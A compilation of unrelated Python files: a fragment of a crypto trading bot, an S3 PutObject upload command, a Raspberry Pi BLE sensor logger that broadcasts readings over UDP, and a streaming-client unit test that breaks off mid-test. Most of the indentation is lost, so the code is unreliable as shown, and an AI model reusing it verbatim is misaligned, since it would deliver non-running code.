self.setDefaults()
self.settings = self.updateSettings(settings)
#threadHandler
self.thread = None
self.botSleep = 15
self.ticks = 0
self.eticks = 0
self.rticks = 0
self.refresh_high = None
self.refresh_low = None
self.candle_remaining = None
wname = "sim:{}:{}".format(self.name,self.market)
self.simwallet = TradeWallet({'market':self.market,'name':wname,'sync':False,'scale':self.scale})
wname = "{}:{}".format(self.name,self.market)
self.wallet = TradeWallet({'market':self.market,'name':wname,'mode':'live','sync':self.syncWallet,'scale':self.scale})
if self.syncWallet:
self.wallet.load()
self.wallet.notify("Traderbot {}: {} started".format(self.name,self.market))
def configure(self, config ):
self.config = {
"market": "",
"candlesize": "5m",
"budget": 0.01,
"maxtrades": 5,
"target": 0.05,
"stop": 0.025,
"notify": ""
}
self.config = { **self.config, **config }
def setDefaults(self):
self.defaults = {
"rsi.buy": 35,
"rsi.sell": 65,
"baseMinDistance": 0.04,
"baseMultiplier": 10,
"short.sma.period": 50,
"long.sma.period": 200,
"sma.bear.score": -25,
"sma.bull.score": 5,
"death.cross": -100,
"golden.cross": 20,
"dband.top": -15,
"dband.bottom": 15,
"bband.below": 5,
"bband.above": -15,
"bband.enter.bottom": 10,
}
def updateSettings(self,override = None):
if override != None:
self.settings = {**self.defaults,**override}
else:
self.settings = self.defaults
return self.settings
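    # Note: updateSettings() merges the overrides onto the defaults via dict
    # unpacking, so e.g. passing {'rsi.buy': 30} changes only that key and leaves
    # every other default from setDefaults() untouched.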
def score( self, score, csdataIndex, message ):
self.history.append({
'candle': self.csdata['time'][csdataIndex],
"score": score,
"message": message
})
return score
def getInfo(self, query=None):
if query in self.apiInfo:
return self.apiInfo[query]
elif query == "stop":
self.stopped = True
return json.dumps({ "message": "bot stopped" })
def getSignals(self,idx):
return { 'signal': None, 'score': 0, 'messages': self.history }
def buildOutput(self):
self.apiInfo["help"] = json.dumps({ "message": "no help here buddy" })
def processRunner(self):
while not self.stopped:
try:
self.process()
self.ticks += 1
except Exception as ex:
print("Error: {}".format(ex))
self.eticks += 1
#raise ex
# print(".",end=" ")
time.sleep(self.botSleep)
def start(self):
self.startDate = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
self.thread = Thread(target=self.processRunner)
self.thread.start()
def stop(self):
self.thread.join()
def isStopped(self):
return self.stopped
def process(self, options = {}):
return None
def refresh(self, scrape=False):
# print("market={},exchange={}".format(self.market, self.exchange))
scraper = Scraper({'market': self.market, 'exchange': self.exchange})
self.candle_remaining = self.trader.getCandleRemaining()
if self.candle_remaining is None:
csdata = None
if scrape:
try:
if self.candlesize == "1d" or self.candlesize == "1h":
cs = self.candlesize
else:
cs = "1m"
# print('scraping:{}'.format(cs))
csdata = scraper.cc_scrapeCandle(cs)
self.scrapeDate = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S')
self.rticks += 1
except Exception as ex:
print(ex)
if self.candlesize not in ("1m","1d","1h"):
csdata = None
self.loadCandlesticks(csdata)
try:
if self.exchange == "bittrex":
self.market_summary = Bittrex().public_get_market_summary(self.market).data["result"][0]
else:
last = scraper.cc_lastprice()
self.market_summary = {"Last": last,"Ask":0,"Bid":0}
except Exception as ex:
self.market_summary = {"Last": self.csdata["closed"][-1],"Ask":0,"Bid":0}
self.last = self.market_summary['Last']
self.csdata['closed'][-1] = self.last
if self.candle_remaining is not None:
if self.last > self.refresh_high:
                self.refresh_high = self.last
if self.last < self.refresh_low:
self.refresh_low = self.last
else:
self.refresh_high = self.csdata["high"][-1]
self.refresh_low = self.csdata["low"][-1]
#self.candle_remaining = self.trader.candle_remaining
self.csdata["high"][-1] = self.refresh_high
self.csdata["low"][-1] = self.refresh_low
self.calculate_ta()
def lastidx(self):
return len(self.csdata['closed']) - 1
def calculate_ta(self):
self.tadata = {}
def createSocket( self, ip="127.0.0.1", port=9500 ):
self.tcpsock = TcpSock(ip,port, self)
self.tcpsock.start()
def closeSocket(self):
self.tcpsock.close()
def candleColor(self, idx ):
if self.csdata['closed'][idx] >= self.csdata['open'][idx]:
return 'green'
else:
return 'red'
def candle(self, idx, ta = None ):
candle = {
"date": self.csdata["time"][idx],
"open": self.csdata["open"][idx],
"high": self.csdata["high"][idx],
"low": self.csdata["low"][idx],
"close": self.csdata["closed"][idx],
"volume": self.csdata["volume"][idx],
"basevolume": self.csdata["basevolume"][idx]
}
if ta is not None:
for name in self.tadata:
if not numpy.isnan(self.tadata[name][idx]):
candle.update({name : self.tadata[name][idx]})
return candle
    def getAnalyzer(self):
return self.analyzer
def getMarket(self):
return self.market
def getName(self):
return self.name
def getIndicators(self):
return self.indicators
def loadCandlesticks(self,csdata=None):
if csdata == None:
self.csdata = self.trader.get_candlesticks(self.timeframe,size=self.candlesize,base_size=self.basesize)
else:
self.csdata = csdata
self.analyzer = Analyzer( self.csdata )
|
putobject.py
|
# Copyright 2013-2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import hashlib
import socket
import sys
import threading
import time
from requestbuilder import Arg
from requestbuilder.exceptions import ArgumentError, ClientError
from requestbuilder.mixins import FileTransferProgressBarMixin
from euca2ools.commands.s3 import S3Request
import euca2ools.util
class PutObject(S3Request, FileTransferProgressBarMixin):
DESCRIPTION = ('Upload an object to the server\n\nNote that uploading a '
                   'large file to a region other than the one the bucket is in '
'may result in "Broken pipe" errors or other connection '
'problems that this program cannot detect.')
ARGS = [Arg('source', metavar='FILE', route_to=None,
help='file to upload (required)'),
Arg('dest', metavar='BUCKET/KEY', route_to=None,
help='bucket and key name to upload the object to (required)'),
Arg('--size', type=int, route_to=None, help='''the number of
bytes to upload (required when reading from stdin)'''),
Arg('--acl', route_to=None, choices=(
'private', 'public-read', 'public-read-write',
'authenticated-read', 'bucket-owner-read',
'bucket-owner-full-control', 'aws-exec-read')),
Arg('--mime-type', route_to=None,
help='MIME type for the file being uploaded'),
Arg('--retry', dest='retries', action='store_const', const=5,
default=0, route_to=None,
help='retry interrupted uploads up to 5 times'),
Arg('--progressbar-label', help=argparse.SUPPRESS)]
METHOD = 'PUT'
def __init__(self, **kwargs):
S3Request.__init__(self, **kwargs)
self.last_upload_error = None
self._lock = threading.Lock()
# noinspection PyExceptionInherit
def configure(self):
S3Request.configure(self)
if self.args['source'] == '-':
if self.args.get('size') is None:
raise ArgumentError(
"argument --size is required when uploading stdin")
source = _FileObjectExtent(sys.stdin, self.args['size'])
elif isinstance(self.args['source'], basestring):
source = _FileObjectExtent.from_filename(
self.args['source'], size=self.args.get('size'))
else:
if self.args.get('size') is None:
raise ArgumentError(
"argument --size is required when uploading a file object")
source = _FileObjectExtent(self.args['source'], self.args['size'])
self.args['source'] = source
bucket, _, key = self.args['dest'].partition('/')
if not bucket:
raise ArgumentError('destination bucket name must be non-empty')
if not key:
raise ArgumentError('destination key name must be non-empty')
def preprocess(self):
self.path = self.args['dest']
if self.args.get('acl'):
self.headers['x-amz-acl'] = self.args['acl']
if self.args.get('mime_type'):
self.headers['Content-Type'] = self.args['mime_type']
# noinspection PyExceptionInherit
def main(self):
self.preprocess()
source = self.args['source']
self.headers['Content-Length'] = source.size
# We do the upload in another thread so the main thread can show a
# progress bar.
upload_thread = threading.Thread(
target=self.try_send, args=(source,),
kwargs={'retries_left': self.args.get('retries') or 0})
# The upload thread is daemonic so ^C will kill the program more
# cleanly.
upload_thread.daemon = True
upload_thread.start()
pbar_label = self.args.get('progressbar_label') or source.filename
pbar = self.get_progressbar(label=pbar_label, maxval=source.size)
pbar.start()
while upload_thread.is_alive():
pbar.update(source.tell())
time.sleep(0.05)
pbar.finish()
upload_thread.join()
source.close()
with self._lock:
if self.last_upload_error is not None:
# pylint: disable=E0702
raise self.last_upload_error
# pylint: enable=E0702
def try_send(self, source, retries_left=0):
self.body = source
if retries_left > 0 and not source.can_rewind:
self.log.warn('source cannot rewind, so requested retries will '
'not be attempted')
retries_left = 0
try:
response = self.send()
our_md5 = source.read_hexdigest
their_md5 = response.headers['ETag'].lower().strip('"')
if their_md5 != our_md5:
                self.log.error('corrupt upload (our MD5: %s, their MD5: %s)',
our_md5, their_md5)
raise ClientError('upload was corrupted during transit')
except ClientError as err:
if len(err.args) > 0 and isinstance(err.args[0], socket.error):
self.log.warn('socket error')
if retries_left > 0:
self.log.info('retrying upload (%i retries remaining)',
retries_left)
source.rewind()
return self.try_send(source, retries_left - 1)
with self._lock:
self.last_upload_error = err
raise
except Exception as err:
with self._lock:
self.last_upload_error = err
raise
class _FileObjectExtent(object):
# By rights this class should be iterable, but if we do that then requests
# will attempt to use chunked transfer-encoding, which S3 does not
# support.
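    # Content-Length is instead supplied explicitly by the caller (PutObject.main
    # sets the header from the extent's size), so the body is streamed via read().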
def __init__(self, fileobj, size, filename=None):
self.closed = False
self.filename = filename
self.fileobj = fileobj
self.size = size
self.__bytes_read = 0
self.__md5 = hashlib.md5()
if hasattr(self.fileobj, 'tell'):
self.__initial_pos = self.fileobj.tell()
else:
self.__initial_pos = None
def __len__(self):
return self.size
@classmethod
def from_filename(cls, filename, size=None):
if size is None:
size = euca2ools.util.get_filesize(filename)
return cls(open(filename), size, filename=filename)
@property
def can_rewind(self):
return hasattr(self.fileobj, 'seek') and self.__initial_pos is not None
def close(self):
self.fileobj.close()
self.closed = True
def next(self):
remaining = self.size - self.__bytes_read
if remaining <= 0:
raise StopIteration()
chunk = self.fileobj.next() # might raise StopIteration, which is good
chunk = chunk[:remaining] # throw away data that are off the end
self.__bytes_read += len(chunk)
self.__md5.update(chunk)
return chunk
def read(self, size=-1):
remaining = self.size - self.__bytes_read
if size < 0:
chunk_len = remaining
else:
chunk_len = min(remaining, size)
chunk = self.fileobj.read(chunk_len)
self.__bytes_read += len(chunk)
self.__md5.update(chunk)
return chunk
@property
def read_hexdigest(self):
return self.__md5.hexdigest()
def rewind(self):
if not hasattr(self.fileobj, 'seek'):
raise TypeError('file object is not seekable')
assert self.__initial_pos is not None
self.fileobj.seek(self.__initial_pos)
self.__bytes_read = 0
self.__md5 = hashlib.md5()
def tell(self):
return self.__bytes_read
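# Note on integrity checking: try_send() above compares the MD5 of the bytes that
# were actually read from the source (_FileObjectExtent.read_hexdigest) against the
# ETag returned by the server, and retries from the recorded initial file position
# when the source supports rewinding.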
|
ble_logger_SensorMedal2_udp_tx.py
|
#!/usr/bin/env python3
# coding: utf-8
################################################################################
# BLE Logger for Rohm SensorMedal-EVK-002 [with UDP data transmission]
# Displays the SensorMedal's sensor readings using a Raspberry Pi.
#
# Copyright (c) 2019 Wataru KUNINO
################################################################################
# [Installation]
# Install bluepy (the Bluetooth LE interface for Python):
# sudo pip3 install bluepy
#
# If pip3 is not installed, run the following first:
# sudo apt-get update
# sudo apt-get install python-pip libglib2.0-dev
#
# [How to run]
# Run with sudo (activity is printed to the console):
# sudo ./ble_logger_SensorMedal2_udp_tx.py &
#
# To keep it running in the background (no console output):
# sudo nohup ./ble_logger_SensorMedal2_udp_tx.py >& /dev/null &
#
# [References]
# The following documents were consulted while writing this program:
# https://www.rohm.co.jp/documents/11401/3946483/sensormedal-evk-002_ug-j.pdf
# https://ianharvey.github.io/bluepy-doc/scanner.html
interval = 3                                # scan / transmit interval (seconds)
udp_to = '255.255.255.255'                  # UDP broadcast address
udp_port = 1024                             # UDP port number
device_s = 'medal'                          # device identifier name (5 characters)
device_n = '3'                              # device identifier number (1 digit)
from bluepy import btle
from sys import argv
import getpass
from time import sleep
import socket
import threading
mutex = False
def payval(num, bytes=1, sign=False):
global val
a = 0
for i in range(0, bytes):
a += (256 ** i) * int(val[(num - 2 + i) * 2 : (num - 1 + i) * 2],16)
if sign:
if a >= 2 ** (bytes * 8 - 1):
a -= 2 ** (bytes * 8)
return a
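# payval() decodes little-endian fields from the hex string held in the global
# 'val'. As a hypothetical example, if val[4:6] == '2c' and val[6:8] == '01',
# then payval(4, 2) returns 0x2c + 0x01 * 256 = 300, and the temperature
# computed below would be -45 + 175 * 300 / 65536 (about -44.2 C).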
def send_udp(s):
    global mutex                                                # get the global mutex object
    mutex.acquire()                                             # acquire the mutex (start of exclusive section)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)     # create the socket
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST,1)   # configure the socket for broadcast
    print(threading.current_thread().name,'send :', s)          # print the data being sent
    udp_bytes = (s + '\n').encode()                             # convert to a byte string
    try:                                                        # transmission block
        sock.sendto(udp_bytes,(udp_to,udp_port))                # send as a UDP broadcast
    except Exception as e:                                      # if an exception occurs
        print(e)                                                # print the error
    sock.close()                                                # close the socket
    sleep(0.5)                                                  # wait for the send to complete
    mutex.release()                                             # release the mutex
argc = len(argv)                                                # number of command-line arguments
if argc >= 2:                                                   # check the number of input parameters
    udp_port = int(argv[1])                                     # set the UDP port number
    if udp_port < 1 or udp_port > 65535:                        # if the port is below 1 or above 65535
        udp_port = 1024                                         # fall back to UDP port 1024
scanner = btle.Scanner()
sensors = dict()
mutex = threading.Lock()                                        # object used for mutual exclusion
while True:
    # BLE reception processing
try:
devices = scanner.scan(interval)
except Exception as e:
print("ERROR",e)
if getpass.getuser() != 'root':
            print('Usage: sudo', argv[0])
exit()
sleep(interval)
continue
    # process the received data for each BLE device
for dev in devices:
print("\nDevice %s (%s), RSSI=%d dB" % (dev.addr,dev.addrType,dev.rssi))
isRohmMedal = False
for (adtype, desc, val) in dev.getScanData():
print(" %s = %s" % (desc, val))
if desc == 'Short Local Name' and val[0:10] == 'ROHMMedal2':
isRohmMedal = True
if isRohmMedal and desc == 'Manufacturer':
                # store the sensor values in the dictionary variable 'sensors'
sensors['ID'] = hex(payval(2,2))
sensors['Temperature'] = -45 + 175 * payval(4,2) / 65536
sensors['Humidity'] = 100 * payval(6,2) / 65536
sensors['SEQ'] = payval(8)
sensors['Condition Flags'] = bin(int(val[16:18],16))
sensors['Accelerometer X'] = payval(10,2,True) / 4096
sensors['Accelerometer Y'] = payval(12,2,True) / 4096
sensors['Accelerometer Z'] = payval(14,2,True) / 4096
sensors['Accelerometer'] = (sensors['Accelerometer X'] ** 2\
+ sensors['Accelerometer Y'] ** 2\
+ sensors['Accelerometer Z'] ** 2) ** 0.5
sensors['Geomagnetic X'] = payval(16,2,True) / 10
sensors['Geomagnetic Y'] = payval(18,2,True) / 10
sensors['Geomagnetic Z'] = payval(20,2,True) / 10
sensors['Geomagnetic'] = (sensors['Geomagnetic X'] ** 2\
+ sensors['Geomagnetic Y'] ** 2\
+ sensors['Geomagnetic Z'] ** 2) ** 0.5
sensors['Pressure'] = payval(22,3) / 2048
sensors['Illuminance'] = payval(25,2) / 1.2
sensors['Magnetic'] = hex(payval(27))
sensors['Steps'] = payval(28,2)
sensors['Battery Level'] = payval(30)
sensors['RSSI'] = dev.rssi
                # print the readings to the console
print(' ID =',sensors['ID'])
print(' SEQ =',sensors['SEQ'])
print(' Temperature =',round(sensors['Temperature'],2),'℃')
print(' Humidity =',round(sensors['Humidity'],2),'%')
print(' Pressure =',round(sensors['Pressure'],3),'hPa')
print(' Illuminance =',round(sensors['Illuminance'],1),'lx')
print(' Accelerometer =',round(sensors['Accelerometer'],3),'g (',\
round(sensors['Accelerometer X'],3),\
round(sensors['Accelerometer Y'],3),\
round(sensors['Accelerometer Z'],3),'g)')
print(' Geomagnetic =',round(sensors['Geomagnetic'],1),'uT (',\
round(sensors['Geomagnetic X'],1),\
round(sensors['Geomagnetic Y'],1),\
round(sensors['Geomagnetic Z'],1),'uT)')
print(' Magnetic =',sensors['Magnetic'])
                print(' Steps =',sensors['Steps'],'steps')
print(' Battery Level =',sensors['Battery Level'],'%')
                # illuminance sensor
s = 'illum_' + device_n[0]
s += ',' + str(round(sensors['Illuminance'],0))
thread = threading.Thread(target=send_udp, args=([s]))
thread.start()
                # environmental sensors (temperature, humidity, pressure)
s = 'envir_' + device_n[0]
s += ',' + str(round(sensors['Temperature'],1))
s += ',' + str(round(sensors['Humidity'],0))
s += ',' + str(round(sensors['Pressure'],0))
thread = threading.Thread(target=send_udp, args=([s]))
thread.start()
                # accelerometer
s = 'accem_' + device_n[0]
s += ',' + str(round(sensors['Accelerometer X'],0))
s += ',' + str(round(sensors['Accelerometer Y'],0))
s += ',' + str(round(sensors['Accelerometer Z'],0))
thread = threading.Thread(target=send_udp, args=([s]))
thread.start()
                # SensorMedal summary
s = device_s[0:5] + '_' + device_n[0]
s += ',' + str(round(sensors['Accelerometer'],0))
s += ',' + str(round(sensors['Geomagnetic'],0))
s += ',' + str(int(sensors['Magnetic'],16))
s += ',' + str(sensors['Battery Level'])
s += ',' + str(sensors['Steps'])
s += ',' + str(sensors['RSSI'])
thread = threading.Thread(target=send_udp, args=([s]))
thread.start()
|
test_channel.py
|
from __future__ import absolute_import
import unittest
import base64
import json
import threading
import time
from mock import call, patch, MagicMock
from dxlstreamingclient.channel import \
(ConsumerError, Channel, ChannelAuth, _PRODUCE_CONTENT_TYPE)
from dxlstreamingclient.error import TemporaryError
def create_record(topic, payload, partition, offset):
return {
"routingData": {
"topic": topic
},
"message": {
"payload": base64.b64encode(json.dumps(payload).encode()).decode()
},
"partition": partition,
"offset": offset
}
def create_records(records):
return {"records": records}
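# For example, create_record("topic1", {"a": 1}, partition=0, offset=5) builds a
# record whose message.payload is the base64-encoded JSON of {"a": 1}; the Channel
# under test is expected to decode that payload back into the original dict when
# consuming.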
class Test(unittest.TestCase):
def setUp(self):
self.url = "http://localhost"
self.username = "someone"
self.password = "password"
self.consumer_group = "a_consumer_group"
def tearDown(self):
pass
def test_retry_condition(self):
auth = ChannelAuth(self.url, self.username, self.password)
with patch("requests.Session"):
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group)
self.assertFalse(channel._retry_if_not_consumer_error(
ConsumerError()))
self.assertTrue(channel._retry_if_not_consumer_error(Exception()))
def test_channel_auth(self):
auth = ChannelAuth(self.url, self.username, self.password)
req = MagicMock()
req.headers = {}
with patch("requests.get") as req_get:
req_get.return_value = MagicMock()
req_get.return_value.status_code = 200
original_token = "1234567890"
req_get.return_value.json = MagicMock(
return_value={"AuthorizationToken": original_token})
req = auth(req)
self.assertIsNotNone(req)
self.assertEqual(req.headers["Authorization"],
"Bearer {}".format(original_token))
new_token = "ABCDEFGHIJ"
req_get.return_value.json = MagicMock(
return_value={"AuthorizationToken": new_token})
# Even though the token that would be returned for a login attempt
# has changed, the original token should be returned because it
# was cached on the auth object.
req = auth(req)
self.assertIsNotNone(req)
self.assertEqual(req.headers["Authorization"],
"Bearer {}".format(original_token))
res = MagicMock()
res.status_code = 403
res.request.headers = {}
with patch("requests.Session") as session:
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group)
create_403_mock = MagicMock()
create_403_mock.status_code = 403
create_200_mock = MagicMock()
create_200_mock.status_code = 200
create_200_mock.json = MagicMock(
return_value={"consumerInstanceId": 1234},
)
self.assertIsNone(channel._consumer_id)
self.assertEqual(auth._token, original_token)
session.return_value.request.side_effect = [
create_403_mock, create_200_mock
]
channel.create()
self.assertEqual(channel._consumer_id, 1234)
# The 403 returned from the channel create call above should
# lead to a new token being issued for the next authentication
# call.
req = auth(req)
self.assertIsNotNone(req)
self.assertEqual(req.headers["Authorization"],
"Bearer {}".format(new_token))
self.assertEqual(auth._token, new_token)
def test_main(self):
auth = ChannelAuth(self.url, self.username, self.password)
case_event = {
"id": "a45a03de-5c3d-452a-8a37-f68be954e784",
"entity": "case",
"type": "creation",
"tenant-id": "7af4746a-63be-45d8-9fb5-5f58bf909c25",
"user": "johndoe",
"origin": "",
"nature": "",
"timestamp": "",
"transaction-id": "",
"case":
{
"id": "c00547df-6d74-4833-95ad-3a377c7274a6",
"name": "A great case full of malware",
"url": "https://mycaseserver.com/#/cases"
"/4e8e23f4-9fe9-4215-92c9-12c9672be9f1",
"priority": "Low"
}
}
with patch("requests.Session") as session:
session.return_value = MagicMock() # self._session
session.return_value.request = MagicMock()
create_mock = MagicMock()
create_mock.status_code = 200
create_mock.json = MagicMock(
return_value={"consumerInstanceId": 1234})
subscr_mock = MagicMock()
subscr_mock.status_code = 204
consum_mock = MagicMock()
consum_mock.status_code = 200
consum_mock.json = MagicMock(
return_value=create_records([
create_record("foo-topic", case_event,
partition=1, offset=1)
]))
commit_consumer_error_mock = MagicMock()
commit_consumer_error_mock.status_code = 404
commit_error_mock = MagicMock()
commit_error_mock.status_code = 500
commit_mock = MagicMock()
commit_mock.status_code = 204
produce_mock = MagicMock()
produce_mock.status_code = 204
delete_mock = MagicMock()
delete_mock.status_code = 204
delete_404_mock = MagicMock()
delete_404_mock.status_code = 404
delete_500_mock = MagicMock()
delete_500_mock.status_code = 500
session.return_value.request.side_effect = [
create_mock, subscr_mock,
consum_mock, commit_consumer_error_mock,
commit_error_mock, commit_mock,
produce_mock,
delete_500_mock, delete_404_mock, delete_mock
]
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
retry_on_fail=False,
verify_cert_bundle="cabundle.crt",
request_timeout=70,
session_timeout=60,
offset="earliest",
extra_configs={
"enable.auto.commit": "true",
"one.extra.setting": "one extra value",
"another.extra.setting": 42
})
self.assertEqual(channel._session.verify, "cabundle.crt")
channel.commit() # forcing early exit due to no records to commit
channel.create()
session.return_value.request.assert_called_with(
"post",
"http://localhost/databus/consumer-service/v1/consumers",
json={
"consumerGroup": self.consumer_group,
"configs": {
"request.timeout.ms": "70000",
"session.timeout.ms": "60000",
"enable.auto.commit": "true",
"auto.offset.reset": "earliest",
"one.extra.setting": "one extra value",
"another.extra.setting": 42
}
}
)
channel.subscribe(["topic1", "topic2"])
session.return_value.request.assert_called_with(
"post",
"http://localhost/databus/consumer-service/v1/consumers/1234/subscription",
json={"topics": ["topic1", "topic2"]}
)
records = channel.consume()
self.assertEqual(records[0]["id"],
"a45a03de-5c3d-452a-8a37-f68be954e784")
with self.assertRaises(ConsumerError):
channel.commit()
with self.assertRaises(TemporaryError):
channel.commit()
channel.commit()
message_payload = {"detail": "Hello from OpenDXL"}
produce_payload = {
"records": [
{
"routingData": {
"topic": "topic1",
"shardingKey": ""
},
"message": {
"headers": {},
"payload": base64.b64encode(
json.dumps(message_payload).encode()).decode()
}
}
]
}
channel.produce(produce_payload)
session.return_value.request.assert_called_with(
"post",
"http://localhost/databus/cloudproxy/v1/produce",
json=produce_payload,
headers={
"Content-Type": _PRODUCE_CONTENT_TYPE
}
)
with self.assertRaises(TemporaryError):
channel.delete() # trigger 500
session.return_value.request.assert_called_with(
"delete",
"http://localhost/databus/consumer-service/v1/consumers/1234")
session.return_value.request.reset_mock()
channel.delete() # trigger silent 404
session.return_value.request.assert_called_with(
"delete",
"http://localhost/databus/consumer-service/v1/consumers/1234")
session.return_value.request.reset_mock()
channel._consumer_id = "1234" # resetting consumer
channel.delete() # Proper deletion
session.return_value.request.assert_called_with(
"delete",
"http://localhost/databus/consumer-service/v1/consumers/1234")
session.return_value.request.reset_mock()
channel.delete() # trigger early exit
def test_path_prefix(self):
auth = ChannelAuth(self.url, self.username, self.password)
with patch("requests.Session") as session:
session.return_value = MagicMock() # self._session
session.return_value.request = MagicMock()
create_mock = MagicMock()
create_mock.status_code = 200
create_mock.json = MagicMock(
return_value={"consumerInstanceId": 1234})
produce_mock = MagicMock()
produce_mock.status_code = 204
session.return_value.request.side_effect = [
create_mock, produce_mock]
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
path_prefix="/base-path",
retry_on_fail=False)
channel.create()
session.return_value.request.assert_called_with(
"post",
"http://localhost/base-path/consumers",
json={"consumerGroup": self.consumer_group,
"configs": {
"auto.offset.reset": "latest",
"enable.auto.commit": "false"
}}
)
channel.produce({})
session.return_value.request.assert_called_with(
"post",
"http://localhost/base-path/produce",
json={},
headers={"Content-Type": _PRODUCE_CONTENT_TYPE}
)
session.return_value.request.reset_mock()
session.return_value.request.side_effect = [
create_mock, produce_mock]
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
consumer_path_prefix="/custom-consumer-path",
producer_path_prefix="/custom-producer-path",
retry_on_fail=False)
channel.create()
session.return_value.request.assert_called_with(
"post",
"http://localhost/custom-consumer-path/consumers",
json={"consumerGroup": self.consumer_group,
"configs": {
"auto.offset.reset": "latest",
"enable.auto.commit": "false"
}}
)
channel.produce({})
session.return_value.request.assert_called_with(
"post",
"http://localhost/custom-producer-path/produce",
json={},
headers={"Content-Type": _PRODUCE_CONTENT_TYPE}
)
def test_run(self):
auth = ChannelAuth(self.url, self.username, self.password)
record_1_payload = {"testing": "record_1"}
record_2_payload = {"testing": "record_2"}
record_1 = create_record("topic1", record_1_payload,
partition=1, offset=1)
record_2 = create_record("topic2", record_2_payload,
partition=1, offset=2)
first_records_group = create_records([record_1, record_2])
record_3_payload = {"testing": "record_3"}
record_3 = create_record("topic3", record_3_payload,
partition=2, offset=3)
second_records_group = create_records([record_3])
third_records_group = create_records([])
expected_payloads_received = [
[record_1_payload, record_2_payload],
[record_3_payload],
[]
]
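        # The mocked responses below exercise the full run() loop: create consumer
        # 1234, subscribe, two consume/commit cycles, then a 404 on consume (the
        # consumer has expired), which triggers a transparent re-create and
        # re-subscribe as consumer 5678 followed by one more consume that returns
        # no records.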
expected_calls = [
call("post",
"http://localhost/databus/consumer-service/v1/consumers",
json={
"consumerGroup": self.consumer_group,
"configs": {
"auto.offset.reset": "latest",
"enable.auto.commit": "false"}}),
call("post",
"http://localhost/databus/consumer-service/v1/consumers/1234/subscription",
json={"topics": ["topic1", "topic2", "topic3"]}),
call("get",
"http://localhost/databus/consumer-service/v1/consumers/1234/records"),
call("post",
"http://localhost/databus/consumer-service/v1/consumers/1234/offsets",
json={
"offsets": [
{"topic": "topic1", "partition": 1, "offset": 1},
{"topic": "topic2", "partition": 1, "offset": 2}
]}),
call("get",
"http://localhost/databus/consumer-service/v1/consumers/1234/records"),
call("post",
"http://localhost/databus/consumer-service/v1/consumers/1234/offsets",
json={
"offsets": [
{"topic": "topic3", "partition": 2, "offset": 3}
]}),
call("get",
"http://localhost/databus/consumer-service/v1/consumers/1234/records"),
call("post",
"http://localhost/databus/consumer-service/v1/consumers",
json={
"consumerGroup": self.consumer_group,
"configs": {
"auto.offset.reset": "latest",
"enable.auto.commit": "false"}}),
call("post",
"http://localhost/databus/consumer-service/v1/consumers/5678/subscription",
json={"topics": ["topic1", "topic2", "topic3"]}),
call("get",
"http://localhost/databus/consumer-service/v1/consumers/5678/records")
]
with patch("requests.Session") as session:
session.return_value = MagicMock() # self._session
session.return_value.request = MagicMock()
create_consumer_1_mock = MagicMock()
create_consumer_1_mock.status_code = 200
create_consumer_1_mock.json = MagicMock(
return_value={"consumerInstanceId": 1234})
subscr_mock = MagicMock()
subscr_mock.status_code = 204
consume_1_mock = MagicMock()
consume_1_mock.status_code = 200
consume_1_mock.json = MagicMock(
return_value=first_records_group)
consume_2_mock = MagicMock()
consume_2_mock.status_code = 200
consume_2_mock.json = MagicMock(
return_value=second_records_group)
consume_not_found_mock = MagicMock()
consume_not_found_mock.status_code = 404
create_consumer_2_mock = MagicMock()
create_consumer_2_mock.status_code = 200
create_consumer_2_mock.json = MagicMock(
return_value={"consumerInstanceId": 5678})
consume_3_mock = MagicMock()
consume_3_mock.status_code = 200
consume_3_mock.json = MagicMock(
return_value=third_records_group)
commit_mock = MagicMock()
commit_mock.status_code = 204
session.return_value.request.side_effect = [
create_consumer_1_mock, subscr_mock,
consume_1_mock, commit_mock,
consume_2_mock, commit_mock,
consume_not_found_mock,
create_consumer_2_mock, subscr_mock,
consume_3_mock, commit_mock]
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
retry_on_fail=True)
payloads_received = []
def on_consume(payloads):
payloads_received.append(payloads)
# Return True (continue consuming) only if at least one
# payload dictionary was supplied in the payloads parameter.
# Return False to terminate the run call
# when no additional payloads are available to consume.
return len(payloads) > 0
session.return_value.request.reset_mock()
channel.run(on_consume, wait_between_queries=0,
topics=["topic1", "topic2", "topic3"])
session.return_value.request.assert_has_calls(expected_calls)
self.assertEqual(payloads_received, expected_payloads_received)
self.assertEqual(len(payloads_received), 3)
def test_stop(self):
auth = ChannelAuth(self.url, self.username, self.password)
with patch("requests.Session") as session:
session.return_value = MagicMock() # self._session
session.return_value.request = MagicMock()
def on_request(method, url,
json=None): # pylint: disable=redefined-outer-name
del method, json
response_json = {}
if url.endswith('/consumers'):
response_json = {"consumerInstanceId": 1234}
elif url.endswith('/records'):
response_json = {"records": []}
response_mock = MagicMock()
